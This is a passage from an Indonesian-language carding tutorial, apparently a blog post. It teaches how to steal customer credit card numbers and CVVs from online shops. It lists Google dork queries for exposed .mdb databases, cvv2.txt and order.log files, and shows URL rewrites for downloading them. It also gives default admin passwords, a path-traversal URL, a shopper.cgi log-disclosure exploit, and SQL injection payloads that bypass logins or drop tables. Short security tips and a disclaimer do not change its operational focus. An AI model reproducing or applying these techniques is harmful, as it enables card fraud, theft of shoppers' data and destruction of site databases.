style="font-size:100%;">Source=<%=server.mappath("vsproducts.mdb")%>;"</span><br /><br /><br /><br /><span style="font-size:100%;">Sebenarnya, situs yang menerapkan model seperti ini, memiliki file test (percobaan):</span><br /><span style="font-size:100%;">http://www.situs-target.com/fpdb/test.asp</span><br /><br /><span style="font-size:100%;">Saya harap dari penjelasan ini, pikiran negatif Anda sudah bisa bangun. Jadi, apabila Anda tidak menemukan file vsproducts.mdb langsung dari hasil searching namun menemukan link seperti di atas, patut Anda curigai. Sebab kemungkinan besar mengandung file vsproducts.mdb.</span><br /><span style="font-size:100%;">Biasanya, pesan yang muncul saat melakukan test tersebut adalah:</span><br /><br /><span style="font-size:100%;">sDSN="Provider=Microsoft.Jet.OLEDB.4.0;Data</span><br /><span style="font-size:100%;">Source=C:\web\database\vsproducts.mdb;"</span><br /><br /><span style="font-size:100%;">Apabila file yang Anda jalankan adalah:</span><br /><span style="font-size:100%;">db_con_open.asp maka pesan yang muncul adalah:</span><br /><br /><span style="font-size:100%;"><% DIM sDSN sDSN="Provider=Microsoft.Jet.OLEDB.4.0;Data Source=C:\web\database\vsproducts.mdb;" %></span><br /><br /><span style="font-size:100%;">Cukup sedikit saja teorinya, kita segera saja membahas poin berikutnya. Pada bagian query Google Anda masukkan syntax:</span><br /><br /><span style="font-size:100%;">allinurl:proddetail.asp?prod=</span><br /><br /><span style="font-size:100%;">Sekarang Anda buka hasil searching Google tersebut, satu per satu.</span><br /><span style="font-size:100%;">Misalnya, nama situs target yang saya peroleh adalah</span><br /><span style="font-size:100%;">http://www.situs-target.com/store/proddetail.asp?prod=10001G</span><br /><br /><span style="font-size:100%;">Saya ubah URL-nya menjadi:</span><br /><span style="font-size:100%;">http://www.situs-target.com/store/fpdb/vsproducts.mdb</span><br /><br /><span style="font-size:100%;">Efek sampingnya adalah Anda bisa mendownload file database secara langsung :).</span><br /><span style="font-size:100%;">Dari kota dialog download tersebut klik tombol Save untuk menyimpan file database yang Anda dapatkan.</span><br /><span style="font-size:100%;">Dalam kotak dialog Save As simpan file tersebut dengan mengklik kembali tombol Save.</span><br /><span style="font-size:100%;">Tunggulah proses download dilakukan sampai selesai. Setelah selesai, klik tombol Open untuk membuka dengan aplikasi MS.Access.</span><br /><span style="font-size:100%;">Perhatikan pada hasil target yang Anda peroleh, tampak bahwa data kartu kredit ada pada tabel Orders. Tiap hasil yang Anda peroleh bisa berbeda antara situs yang satu dengan situs yang lain.</span><br /><br /><span style="font-size:100%;">Selain itu, kita juga akan memperoleh nama administrator beserta passwordnya pada bagian Admin.</span><br /><span style="font-size:100%;">Nah, Anda sudah mendapatkan satu database pertama.</span><br /><span style="font-size:100%;">Sebagai tambahan untuk penjelasan bagian ini, saya harap Anda bisa mempermainkan folder atau directory yang terdapat di dalamnya. Masalah mempermainkan folder ini termasuk dalam bagian ilmu Google Hacking atau Google Dorks. Pada kesempatan ini cukup saya jelaskan sekilas saja.</span><br /><span style="font-size:100%;">Misalnya Anda mendapat target:</span><br /><span style="font-size:100%;">http://www.situs-target.com/store/proddetail.asp?prod=10001G</span><br /><br /><span style="font-size:100%;">Ubah URL-nya menjadi:</span><br /><span style="font-size:100%;">http://www.situs-target.com/store/fpdb/vsproducts.mdb</span><br /><span style="font-size:100%;">http://www.situs-target.com/fpdb/vsproducts.mdb</span><br /><span style="font-size:100%;">http://www.situs-target.com/store/vsproducts.mdb</span><br /><span style="font-size:100%;">http://www.situs-target.com/vsproducts.mdb</span><br /><br /><span style="font-size:100%;">Tujuannya adalah untuk menemukan dimana letak file database disembunyikan.</span><br /><span style="font-size:100%;">Proses kreatif lainnya yang perlu Anda pahami adalah mengira-ngira nama file yang mirip. Hal ini sengaja saya jelaskan pada bagian awal. Sebab, jika nanti-nanti Anda sedang mencoba beraksi ternyata tidak berhasil, maka Anda harus memahami bagian ini, karena saya tidak akan menjelaskan lagi pada bagian berikutnya.</span><br /><span style="font-size:100%;">Contohnya begini, saya ambil dari kasus di atas, nama file database-nya adalah: vsproducts.mdb. Kira-kira yang mirip adalah file vsproduct.mdb (tanpa huruf s). Atau mungkin saja vspproducts.mdb, vspproduct.mdb, pokoknya pintar-pintar Anda-lah.</span><br /><span style="font-size:100%;">Walaupun hal ini kelihatannya sepele, sebenarnya dari banyak kejadian yang saya temukan banyak yang berhasil. Hal ini terjadi karena untuk mengamankan sebuah sistem, sering nama file database disamarkan, dan biasanya pula namanya hampir mirip-mirip. Contoh lainnya, ada tulisan orders, ada juga order. Bahkan beberapa kasus bersifat case sensitive, jadi apabila Anda mengetikkan Credit Card akan dianggap berbeda dibanding mengetikkan credit card.</span><br /><span style="font-size:100%;">Itulah dua poin penting yang perlu Anda pahami, supaya hasil target Anda menjadi lebih banyak. Tentu saja semua itu butuh kesabaran dan kreativitas. Sebagai bonus dari saya untuk bagian ini, adalah berikut halaman loginnya:</span><br /><span style="font-size:100%;">http://www.situs-target.com/vsadmin/admin.asp</span><br /><span style="font-size:100%;">dengan account dan password default adalah mystore dan changeme.</span><br /><span style="font-size:100%;">Seandainya Anda tidak bisa masuk dengan password default, Anda tetap masih bisa masuk menggunakan account dan password dan file database yang Anda peroleh. :)</span><br /><br /><span style="font-size:100%;">Shopping.mdb</span><br /><span style="font-size:100%;">Salah satu file database yang paling terkenal adalah shopping.mdb. Nama file database ini yang dibuat menggunakan MS.Access, biasanya juga terhubung dengan ASP. Berikut adalah teknik untuk mendapatkan file database tersebut yang berisikan data customer.</span><br /><span style="font-size:100%;">Seperti biasa, gunakan Google untuk mencari targetnya. Langkah detilnya sudah saya jelaskan pada bagian mencari database yang pertama, jadi saya tidak akan mengulang-ulang lagi. Maka saya hanya akan menyebutkan syntax-nya saja untuk bagian berikutnya.</span><br /><span style="font-size:100%;">Syntax: inurl:shopping.mdb</span><br /><span style="font-size:100%;">Dari link hasil searching, saya hanya perlu mendownload file databasenya. Isinya bukan hanya data kartu kredit baik customer maupun orders. Ada juga password user dan administrator di dalamnya.</span><br /><span style="font-size:100%;">Proses download bisa berbeda pada tiap orang, terutama bila menggunakan aplikasi software internet download manager yang cukup beragam dalam mendownload file database.</span><br /><span style="font-size:100%;">Saya tidak mau berpanjanglebar menjelaskan masalah teknik dan nama file secara spesifik. Saya lebih tertarik untuk mengajarkan konsepnya. Sebab dengan cara seperti itu, Anda bisa mengembangkan sendiri teknik yang diperlukan. Mengapa hal ini saya tekankan, karena nama file database bisa saja berbeda-beda. Tergantung dari nama pembuat filenya dan juga demi alasan keamanan. Sebenarnya, jika Anda mau sedikit usaha, Anda bisa memodifikasi syntax: inurl:shopping.mdb , menjadi bentuk lainnya. Dalam hal ini, saya mencoba mengubahnya menjadi:</span><br /><span style="font-size:100%;">Shopping350.mdb, shopping400.mdb, dan shopping450.mdb.</span><br /><span style="font-size:100%;">Bahkan juga ada shopping.mdb, yang berupa nama file database adalah nama situs itu sendiri. Ternyata banyak juga hasil searching yang memuaskan untuk menjadi bahan latihan carding. Ini penting bagi calon ahli webmaster yang mungkin suatu saat berminat bekerja sebagai webmaster atau penjaga keamanan situs belanja di internet.</span><br /><br /><span style="font-size:100%;">Eipc.mdb</span><br /><span style="font-size:100%;">File database eipc.mdb adalah file default dari ProductCart. Biasanya, file ini disimpan dalam direktori productcart/database/eipc.mdb. Ada juga dari file tersebut yang mengalami proteksi password. Untuk mencari situs yang memakai sistem database ini gunakan syntax berikut untuk mencarinya di google.com</span><br /><span style="font-size:100%;">Syntax: allinurl:productcart/database/EIPC.mdb</span><br /><br /><span style="font-size:100%;">Expire.mdb</span><br /><span style="font-size:100%;">Kalau diterjemahkan secara kasar maka expire.mdb berarti tanggal berakhirnya sebuah kartu kredit. Walau sebenarnya maksudnya bukan itu, tapi nyatanya itu tetap berhubungan dengan carding. Bingung bukan?</span><br /><span style="font-size:100%;">Sebenarnya, ini adalah file default dari CatalogIntegrator Cart; yang merupakan aplikasi e-commerce yang dijual pertama kali oleh pihak Adobe System. Aplikasi ini lebih bersifat customer friendly, dan mudah digunakan sehingga cukup banyak pihak yang tertarik untuk menggunakannya.</span><br /><span style="font-size:100%;">Syntax: inurl:expire.mdb</span><br /><span style="font-size:100%;">Sebagai tambahan saja, pada kebanyakan kasus password default untuk admin yang menggunakan expire.mdb adalah demo, dengan nama account admin adalah: admin</span><br /><span style="font-size:100%;">Halaman loginnya:</span><br /><span style="font-size:100%;">http://www.situs-target.com/Catalog/Admin/admin.asp</span><br /><span style="font-size:100%;">Perhatikan dengan benar huruf besar kecilnya pada URL supaya tidak terjadi error.</span><br /><span style="font-size:100%;">Lokasi file expire.mdb itu sendiri bisa Anda perhatikan secara cermat.</span><br /><span style="font-size:100%;">Apalagi jika seseorang bisa masuk, maka dia akan dapat melihat berbagai order pembelian dan tentu saja nomor kartu kredit terdapat di dalamnya. Tapi, saya rasa dengan mendapatkan file database-nya saja sudah cukup kok.</span><br /><br /><span style="font-size:100%;">Products.mdb</span><br /><span style="font-size:100%;">Sebenarnya ini adalah nama file database yang cukup umum digunakan. Oleh karena ini milik umum maka isinya bisa saja bermacam-macam. Ada yang menampilkan nama produk saja dalam database. Ada pula yang menampilkan daftar order termasuk nomor kartu kredit pada konsumen.</span><br /><span style="font-size:100%;">Namun, jangan ragu jangan takut, banyak juga kok yang berisikan data konsumen. Tapi ada pula beberapa yang tidak menyertai nomor kartu kredit.</span><br /><span style="font-size:100%;">Ha...ha...ha...apa Anda bingung bacanya. Makanya lebih enakan filenya Anda download sendiri yang banyak biar jelas.</span><br /><span style="font-size:100%;">Syntax: inurl:products.mdb</span><br /><br /><span style="font-size:100%;">Billing.mdb</span><br /><span style="font-size:100%;">File database billing.mdb ini menyimpan data kartu kredit dalam tabel Payments. Supaya lebih enak, mendingan Anda buka semua tabel dari hasil download yang Anda dapatkan. Sebab data kartu kredit tidak hanya disimpan dalam tabel Credit Cards, Orders, dan Customers. Karena bisa saja dimanipulasi oleh pembuat database, misalnya nama tabel Time (waktu), tapi isinya malah nomor kartu kredit. Dan hal ini berlaku bagi semua file database dalam buku ini. Makanya jangan cepat menyerah, tetap semangat untuk memperoleh pengalaman dan pengetahuan baru mengenai network security ini.</span><br /><br /><span style="font-size:100%;">Shop.mdb</span><br /><span style="font-size:100%;">Berikut adalah jenis database lainnya yang sering digunakan untuk aktivitas carding. Shop.mdb, jika diterjemahkan berarti database toko, tentu saja isinya bisa komplit termasuk kartu kredit customer.</span><br /><span style="font-size:100%;">Syntax: inurl:shop.mdb</span><br /><span style="font-size:100%;">Setiap file shop.mdb yang saya temukan selalu berupa form. Jika mau, Anda juga bisa membuka dalam bentuk tabel.</span><br /><br /><span style="font-size:100%;">Exploitshop.mdb</span><br /><span style="font-size:100%;">Dalam kesempatan ini saya tidak akan banyak berbicara mengenai exploit. Mengapa hal ini saya batasi, sebab kebanyakan exploit adalah teknik kuno yang sudah basi sehingga tidak banyak digunakan lagi. Beberapa exploit yang saya bahas dalam artikel ini, tujuan sebenarnya hanyalah untuk memberikan cara lain sebagai bentuk variasi, paling tidak untuk memberikan wawasan dan pengetahuan baru bagi Anda, terutama para calon webmaster. Dan selain itu juga sekaligus untuk membuka mata Anda supaya tahu bahwa tidak semuanya bisa langsung dengan cara mendownload database maupun file log. Masih dengan nama database yang sama, yaitu shop.mdb. Hanya saja model syntax dan teknik yang dilakukan berbeda.</span><br /><span style="font-size:100%;">Syntax: inurl:mall/lobby.asp</span><br /><span style="font-size:100%;">Dari situs target yang Anda temukan saat searching di Google, bukalah URL yang ditampilkan oleh Google. Biasanya, nama URL-nya adalah:</span><br /><span style="font-size:100%;">http://www.situs-target.com/mall/lobby.asp</span><br /><br /><span style="font-size:100%;">Yang harus Anda lakukan adalah mengubah string</span><br /><span style="font-size:100%;">mall/lobby.asp</span><br /><span style="font-size:100%;">menjadi</span><br /><span style="font-size:100%;">fpdb/shop.mdb</span><br /><br /><span style="font-size:100%;">Sehingga secara lengkap akan menjadi:</span><br /><span style="font-size:100%;">http://www.situs-target.com/fpdb/shop.mdb</span><br /><span style="font-size:100%;">Selanjutnya, Anda tinggal mendownload file databasenya. Data mengenai kartu kredit tersimpan pada bagian Payments (pembayaran).</span><br /><br /><span style="font-size:100%;">Store.mdb</span><br /><span style="font-size:100%;">File database store.mdb ini adalah nama lain dari shop, juga nama lain untuk products. Walau demikian, file store.mdb ini menyimpan cukup banyak nomor kartu kredit. Dan biasanya disimpan dalam tabel Carthead.</span><br /><span style="font-size:100%;">Syntax: inurl:store.mdb</span><br /><br /><span style="font-size:100%;">Mystore.mdb</span><br /><span style="font-size:100%;">Setelah menggunakan syntax store.mdb, berikut ini adalah model lainnya, yaitu: mystore.mdb. File database mystore.mdb ini banyak digunakan pada aplikasi shopping cart FPcartPal. Sistem ini menangani kartu kredit yang lebih aman. Sebab mereka menggunakan PayPal. Paypal adalah salah satu alat pembayaran elektronik di internet.</span><br /><span style="font-size:100%;">Syntax: inurl:mystore.mdb</span><br /><span style="font-size:100%;">Jujur saja, database ini tidaklah berisi nomor kartu kredit, sebab saya hanya ingin menunjukkan pada Anda bagaimana memodifikasi sebuah syntax. Dalam hal ini, dari store.mdb menjadi mystore.mdb. Sebenarnya, berhubungan dengan file mystore.mdb pada sistem yang sama terdapat sebuah file laporan yaitu reports.mdb. Isinya adalah laporang tentang transaksi, nggak ada kartu kreditnya. Tapi para carder biasanya memanfaatkan untuk hal lainnya. Sebab siapa tahu saja, barangkali ada file database reports.mdb yang menyimpan data kartu kredit karena bukan bagian dari produk FpcartPal, begitu pula untuk mystore.mdb.</span><br /><br /><span style="font-size:100%;">Order.mdb</span><br /><span style="font-size:100%;">Saya rasa Anda sudah mengenal dengan jelas order.mdb yang berarti file database pemesanan. Berarti setiap pesanan akan disimpan dalam database yang satu ini. Tentu saja untuk berbelanja salah satu sarananya adalah untuk menggunakan kartu kredit.</span><br /><span style="font-size:100%;">Syntax: inurl:order.mdb</span><br /><br /><span style="font-size:100%;">Cart.mdb</span><br /><span style="font-size:100%;">Ini dia kata-kata yang sering digunakan dalam online shop. Semua barang belanjaan di internet akan dimasukkan ke dalam cart (keranjang). Nah, seseorang bisa saja memanfaatkannya untuk melakukan aktivitas carding.</span><br /><span style="font-size:100%;">Syntax: inurl:cart.mdb</span><br /><span style="font-size:100%;">Kemungkinan lain dari database ini yang telah dimodifikasi. Misalnya, shoppingcart.mdb, shopping_cart.mdb, cart.mdb, clickcart.mdb, dan berbagai bentuk lainnya. Sesuai dengan kesukaan sang pemilik situs. Trik ini digunakan untuk mengelabui para carder supaya tidak bisa mendapatkan file mdb dengan mudah.</span><br /><br /><span style="font-size:100%;">Scart.mdb</span><br /><span style="font-size:100%;">Serupa tapi tak sama. Itulah yang bisa saya jelaskan mengenai database scart.mdb. Ada dua model syntax yang bisa Anda coba gunakan.</span><br /><span style="font-size:100%;">allinurl:admin/scart.mdb</span><br /><span style="font-size:100%;">atau</span><br /><span style="font-size:100%;">inurl:scart.mdb</span><br /><span style="font-size:100%;">Sebenarnya model syntax ini bisa Anda modifikasi sendiri, termasuk juga untuk syntax-syntax lainnya yang terdapat dalam artikel ini. Kreatiflah mengubah syntax seperti kasus store menjadi mystore. Kalau Anda mau lebih jelas, Anda harus banyak belajar mengenai berbagai syntax google hacking (google dorks).</span><br /><br /><span style="font-size:100%;">ExploitScart.mdb</span><br /><span style="font-size:100%;">Untuk nama database yang sama, yaitu scart.mdb, akan saya berikan sebuah exploit. Langsung saja, dengan menggunakan syntax untuk Google:</span><br /><span style="font-size:100%;">inurl:shopKart20</span><br /><span style="font-size:100%;">Bisa juga dimodifikasi menjadi "/shopKart20/"</span><br /><span style="font-size:100%;">(tanda kutip duanya tetap digunakan)</span><br /><span style="font-size:100%;">Selanjutnya Google akan menampilkan target-target empuk yang mempunyai celah keamanan yang belum sempurna. Silakan Anda buka saja. Misalnya:</span><br /><span style="font-size:100%;">http://www.situs-target.com/ashopKart20/addprod.asp</span><br /><span style="font-size:100%;">Pertama-tama hilangkan tanda string: ashopKart20 dan seterusnya. Kemudian tambahkan string:</span><br /><span style="font-size:100%;">admin/scart.mdb</span><br /><span style="font-size:100%;">Jadinya:</span><br /><span style="font-size:100%;">http://www.situs-target.com/admin/scart.mdb</span><br /><span style="font-size:100%;">Secara otomatis akan muncul pesan apakah Anda akan mendownload file database.</span><br /><span style="font-size:100%;">Anda bisa mendownload file database langsung ataupun menggunakan program pihak ketiga, misalnya internet download manager yang softwarenya banyak ditemui di internet dan bisa didownload lalu diinstal di komputer Anda.</span><br /><span style="font-size:100%;">Dalam database tersebut, nomor kartu kredit berada pada bagian orders. Sedangkan informasi pembeli berada pada bagian Customers. Sehingga nama pemilik kartu kredit bisa diketahui dari tabel customers lalu dicocokkan id-nya dengan orders.</span><br /><span style="font-size:100%;">Miscellaneous Database</span><br /><span style="font-size:100%;">Berikut ini adalah teknik untuk mendapatkan file database, yang boleh dibilang nama databasenya acak. Jadi miscellaneous bukan berarti itu adalah nama sebuah database. Sebenarnya hampir sama saja cara dan tekniknya dengan beberapa yang ada yang tadi sudah dibahas. Nama database itu bisa apa saja, misalnya toko.mdb, jual.mdb.</span><br /><span style="font-size:100%;">Akan saya suguhkan sebuah contoh kasus.</span><br /><span style="font-size:100%;">Syntax: /shop/category.asp/catid</span><br /><span style="font-size:100%;">Misalnya, Anda menemukan target dengan url:</span><br /><span style="font-size:100%;">http://www.situs-target.com/shop/category.asp?catid=37</span><br /><span style="font-size:100%;">Hapuslah shop/category.asp?catid=37 (angkanya bisa berapapun, tergantung situs target yang Anda peroleh). Kemudian ganti menjadi:</span><br /><span style="font-size:100%;">/admin/dbsetup.asp</span><br /><span style="font-size:100%;">Maka nama situsnya menjadi:</span><br /><span style="font-size:100%;">http://www.situs-target.com//admin/dbsetup.asp</span><br /><span style="font-size:100%;">Perhatikan dengan baik dan benar, garis miring (/) yang digunakan sebelum admin ada dua buah (//admin). Jadi itu bukan karena salah ketik!</span><br /><span style="font-size:100%;">Berikut adalah tampilan dua buah target yang saya temukan. Sengaja pada bagian ini saya memberikan contoh dua buah target untuk menampilkan mana file databasenya.</span><br /><span style="font-size:100%;">Misalnya dari contoh target yang pertama, nama file databasenya adalah icommerce.mdb. Sedangkan nama file database untuk situs target kedua adalah worldofwater.mdb.</span><br /><span style="font-size:100%;">Urusan download database-nya sekarang saya serahkan pada Anda supaya logika dan pikiran Anda bisa berkembang. Lagipula nama databasenya sudah ketahuan kok.</span><br /><br /><span style="font-size:100%;">SHOPPER EXE EXPLOIT</span><br /><span style="font-size:100%;">Berikut ini syntax yang bisa dicoba:</span><br /><span style="font-size:100%;">http://www.situs-target.com/cgi-bin/shopper.exe?search=action&keywords=Dy4-VoN%2520&template=order.log</span><br /><br /><span style="font-size:100%;">atau</span><br /><br /><span style="font-size:100%;">http://www.situs-target.com/cgi-bin/shopper.cgi?search=action&keywords=Dy4-VoN%20&template=order.log</span><br /><br /><span style="font-size:100%;">looding sebentar.......</span><br /><br /><span style="font-size:100%;">Wah ternyata, banyak juga log file hasil shopping yang ditemukan....</span><br /><br /><span style="font-size:100%;">Setelah penulis cek dan lihat hasil log file nya banyak juga cc yang masih fresh tapi tidak ada no cvv nya, hanya no pemegang kartu dan no cc dan cardExpire.</span><br /><br /><span style="font-size:100%;">Sekali lagi, ini hanya ilmu pengetahuan dan sangat tidak disarankan untuk menyalahgunakannya.</span><br /><span style="font-size:100%;">Jika anda sebagai web master dari shopping online, tentunya anda harus lebih berhati-hati dengan teknik ini.</span><br /><br /><span style="font-size:100%;">SECURITY TIPS (TIPS UNTUK KEAMANAN JARINGAN WEBSITE ANDA)</span><br /><span style="font-size:100%;">Khusus untuk Anda yang mengelola sebuah situs online shopping, usahakanlah untuk membuat file database yang tidak bisa diakses melalui directory public. Hindari meletakkan file database pada webroot. (Tahu kan apa yang dimaksud dengan webroot? kalau nggak tahu banyaklah membaca buku-buku tentang jaringan internet, atau bisa juga membaca-baca di wikipedia.com)</span><br /><span style="font-size:100%;">Buatlah permission untuk mengakses database pada sebuah direktori khusus, hal ini akan mencegah orang lain mendownload file database. Jangan gunakan nama database default. Ubahlah menjadi nama lainnya yang Anda rasa aman. Untuk para user, berhati-hatilah untuk berbelanja pada situs online. Carilah informasi mengenai sistem keamanan situs tersebut. Dan pastikan bahwa halaman belanja yang Anda buka bukanlah scam page, juga bukan phising.</span><br /><br /><span style="font-size:100%;">INSTANT CARDING</span><br /><br /><span style="font-size:100%;">Pada dasarnya, teknik instant carding ini tidak jauh berbeda dengan teknik carding dengan mendownload file database. Hanya saja instant carding adalah aktivitas carding yang dilakukan tanpa perlu mendownload file database. Contoh yang paling gampang adalah saat Anda browsing lalu membuka file HTML dan nomor-nomor kartu kredit langsung tampil. Jenis file lainnya yang bisa langsung tampil adalah file TXT (text). Khusus untuk file LOG; ada yang bisa menampilkan isi file berupa nomor kartu kredit langsung pada browser. Terkadang ada pula yang perlu menjalani proses download yang disimpan pada folder temporary yang selanjutnya dibuka menggunakan Notepad. Atau bisa juga didownload sendiri oleh Anda.</span><br /><br /><span style="font-size:100%;">Web_store</span><br /><span style="font-size:100%;">Sebenarnya ada banyak aplikasi web store yang digunakan, terutama menggunakan CGI. Teknik yang digunakan berikut ini adalah dengan langsung mengakses dalam directory dengan memanfaatkan syntax Index of.</span><br /><span style="font-size:100%;">Syntax: intitle:"Index of" user_carts OR user_cart</span><br /><span style="font-size:100%;">Dari situs target yang ditemukan dari hasil pencarian di google.com, saya membuka beberapa diantaranya. sebenarnya di dalam directory tersebut terdapat beberapa informasi menarik, seperti file web_store.cgi, dan directory lainnya. Saya akan fokus pada tujuan kita saja. Dalam bagian Index Of tersebut, pertama-tama saya membuka folder User_carts. Ternyata isinya kosong, berarti bukan folder ini tempat penyimpanan file order.</span><br /><span style="font-size:100%;">Cukup hanya dengan menggunakan logika saja, kemungkinan besar lokasi lain yang digunakan adalah folder Admin_files.</span><br /><span style="font-size:100%;">Ternyata dugaan saya benar. File order.log tersimpan dalam folder Admin_files.</span><br /><span style="font-size:100%;">Tanpa perlu basa-basi lagi, Anda bisa langsung mendownloadnya. Atau bisa juga ditampilkan langsung di browser. Sayangnya pada beberapa kasus, cara seperti ini malah menimbulkan error alias tidak bisa dibuka. Lebih enak dan lebih aman dengan membuka menggunakan Notepad saja.</span><br /><br /><span style="font-size:100%;">CVV2</span><br /><span style="font-size:100%;">Anda masih ingat dengan penjelasan di awal bahwa adanya kode rahasia pada setiap kartu kredit. Kita akan memanfaatkan kode tersebut untuk aktivitas carding. Sebelumnya Anda telah mencoba menggali file LOG, sekarang jenis file yang akan dijajal adalah TXT. Syntax yang saya gunakan di sini sangatlah sederhana:</span><br /><span style="font-size:100%;">inurl:cvv2.txt</span><br /><span style="font-size:100%;">Tapi hasilnya, sungguh luar biasa. Posisi file cvv2.txt ini bisa berada di mana saja. Saya bahkan menemukan cvv2.txt yang disembunyikan dalam directory images, yang biasanya digunakan untuk file-file gambar. Itulah salah satu trik untuk mengelabui. Misalnya, yang saya temukan adalah:</span><br /><span style="font-size:100%;">http://www.situs-target.com/images/cvv2.txt</span><br /><br /><span style="font-size:100%;">Order.Log</span><br /><span style="font-size:100%;">Sekarang kita kembali mencari file log yang merupakan instant carding. Sebab, Anda bisa melihat hasil temuan dengan instant tanpa perlu mendownload database. Sebenarnya nama file order.log sudah umum digunakan untuk menyimpan catatan order pembelian. Berikut syntax yang perlu Anda masukkan dalam Google. Syntax:</span><br /><span style="font-size:100%;">inurl:order.log</span><br /><span style="font-size:100%;">Sewaktu Anda memperoleh target, maka file log langsung tampil di browser. Supaya tampil rapi data yang ada dalam Notepad tersebut dicopy dan paste pada MS-Word. Ini hanya untuk merapikan saja, supaya lebih enak dipandang, bukan berarti nomor kartu kreditnya lebih banyak muncul.</span><br /><br /><span style="font-size:100%;">ExploitOrder.log</span><br /><span style="font-size:100%;">Jika di atas adalah metode langsung menemukan file order dan sebagainya, berikut ini saya berikan sebuah exploit pada store CGI. Sebenarnya ada banyak kasus untuk store CGI ini, ada juga yang bisa dilakukan melalui SQL Injection. Tapi di sini saya fokuskan paa menampilkan file log pada browser untuk aktivitas Instant Carding.</span><br /><span style="font-size:100%;">Syntax: allinurl:/cgi-bin/store/index.cgi?page=</span><br /><span style="font-size:100%;">Dari hasil target yang diperoleh, cobalah membuka satu per satu. Misalnya, di sini saya memperoleh target:</span><br /><span style="font-size:100%;">http://www.situs-target.com/cgi-bin/store/index.cgi?page=apa-pun.html</span><br /><span style="font-size:100%;">Buanglah string yang terdapat di belakang page=</span><br /><span style="font-size:100%;">Maka URL menjadi:</span><br /><span style="font-size:100%;">http://www.situs-target.com/cgi-bin/store/index.cgi?page=</span><br /><span style="font-size:100%;">Selanjutnya masukkan string berikut, sebagai pengganti string yang dihapus.</span><br /><span style="font-size:100%;">../admin/files/order.log</span><br /><span style="font-size:100%;">Maka URL-nya menjadi:</span><br /><span style="font-size:100%;">http://www.situs-target.com/cgi-bin/store/index.cgi?page=../admin/files/order.log</span><br /><span style="font-size:100%;">Selanjutnya kaan tampil daftar order yang berisikan nomor kartu kredit customer.</span><br /><span style="font-size:100%;">Bahkan data yang ditampilkan lengkap dengan nomor CVV kartu kredit tersebut.</span><br /><span style="font-size:100%;">Sebuah teknik yang hampir sama dengan di atas untuk memperoleh file order.log, yaitu sebuah modus lama yang sudah terkenal, yaitu dengan menggunakan syntax:</span><br /><span style="font-size:100%;">shopper.cgi</span><br /><span style="font-size:100%;">Lalu pada akhir URL Anda hanya perlu menambahkan string berikut:</span><br /><span style="font-size:100%;">&template=order.log</span><br /><br /><span style="font-size:100%;">SECURITY TIPS.</span><br /><span style="font-size:100%;">Sebenarnya tips ini juga dapat diterapkan pada kasus carding-in database.</span><br /><span style="font-size:100%;">Hapus atau gantilah nama file yang sedikit riskan, misalnya: order.log, cvv2.txt, cmd.exe, cart32.exe dan sebagainya.</span><br /><span style="font-size:100%;">Simpanlah file-file penjualan yang riskan tersebut pada directory yang susah dijangkau oleh orang lain.</span><br /><span style="font-size:100%;">Sebisa mungkin hindari penyimpanan file transaksi dalam bentuk html. Khusus untuk file log, sering-seringlah dihapus supaya tidak kecolongan.</span><br /><span style="font-size:100%;">Untuk para user, pesan saya cuma sedikit : WASPADALAH!</span><br /><br /><br /><span style="font-size:100%;">SQL INJECTION.</span><br /><span style="font-size:100%;">Sebelum membahas tentang sql injection pertama-tama saya akan menerangkan apa itu sql injection dan kenapa bisa terjadi.</span><br /><span style="font-size:100%;">Sebenernya SQL injection terjadi ketika attacker bisa meng insert beberapa SQL statement ke 'query' dengan cara manipulasi data input ke applikasi tsb.</span><br /><span style="font-size:100%;">Diantara DB format seperti PHP MySQL dan ASP MSACCESS atau dengan MySql ,</span><br /><span style="font-size:100%;">disini gw cuma akan membahas tentang ASP MsSql yang udah dicoba pada IIS 5 dan</span><br /><span style="font-size:100%;">beberapa sql injection pada url.</span><br /><span style="font-size:100%;">Biasa Sql Injection dilakukan pada login page pada asp seperti di :</span><br /><span style="font-size:100%;">admin\login.asp</span><br /><span style="font-size:100%;">login.asp</span><br /><span style="font-size:100%;">Jadi yang akan menjadi target itu page tersebut, sekarang kita mulai aja dengan dasar-dasar sql injection :d.</span><br /><span style="font-size:100%;">Biasanya di sql statment</span><br /><span style="font-size:100%;">select id, user_name, password from user</span><br /><span style="font-size:100%;">maksudnya perintah diatas menghasilkan data id, user_name dan password pada table user.</span><br /><span style="font-size:100%;">Biasanya pada login page dengan mengunakan statment result setnya sebagai berikut :</span><br /><span style="font-size:100%;">select id, user_name,password from user where name = 'echo' and password='password'</span><br /><span style="font-size:100%;">Pada IIS dan ASP apabila terdapat kesalahan sintax scr i pt akan diberi tau dan ditampilkan di browser</span><br /><span style="font-size:100%;">Server: Msg 170, Level 15, State 1, Line 1 Line 1: Incorrect syntax near 'jopi' SQL atau "Structured Query Language"</span><br /><span style="font-size:100%;">seharusnya tidak menyentuh system calls. Tetapi tidak dengan MSSQL.</span><br /><span style="font-size:100%;">Nah, ga tau kenapa karakter single quote 'breaks out' dari delimiter nya SQL. Jadi kalau misal ada inputan</span><br /><span style="font-size:100%;">User: echo';drop table user--</span><br /><span style="font-size:100%;">dan akibatnya akan fatal , dan artinya adalah kita menghapus table user dan akan kosong deh tuh loginya :D</span><br /><span style="font-size:100%;">oh iya '--' merupakan mark nya MSSQL, jadi perintah selanjutnya nggak di execute.</span><br /><span style="font-size:100%;">Sekarang untuk lebih jelasnya kita secara langsung pada login scr i pt seperti</span><br /><span style="font-size:100%;">input login password. Nama field nya 'login' dan 'pass'. dan</span><br /><span style="font-size:100%;">SQL nya di asp: var sql = select * from users where username='" login "' and password='" pass"'";</span><br /><span style="font-size:100%;">coba kalau ada inputan: login: ';drop table users-- pass: chfn (*wink* negative)</span><br /><br /><span style="font-size:100%;">pasti ke drop table users</span><br /><span style="font-size:100%;">Aduh pada pusing ya , gini deh cara gampangnya and kita lupakan yang diatas :P kita langsung praktek aja></span><br /><span style="font-size:100%;">Coba cari disitus-situs yang menggunakan asp dan MsSql sebagai DB nya (kalau anda punya situs belanja online milik Anda sendiri, lebih baik diujicoba di situs sendiri sehingga tidak merugikan orang lain), lalu cari login.asp atau</span><br /><span style="font-size:100%;">admin\login.asp.</span><br /><span style="font-size:100%;">Kalau udah dapet masukin nich variable sql nya</span><br /><br /><span style="font-size:100%;">user:admin</span><br /><span style="font-size:100%;">pass:' or 1=1--</span><br /><br /><span style="font-size:100%;">Ingat kita disini hanya coba-coba kali aja dba nya ga pinter :d</span><br /><span style="font-size:100%;">atau :</span><br /><span style="font-size:100%;">user:' or 1=1--</span><br /><span style="font-size:100%;">admin:' or 1=1--</span><br /><br /><span style="font-size:100%;">Gak bisa nich gimana ya ?</span><br /><span style="font-size:100%;">Inget sekarang rata-rata para admin pada 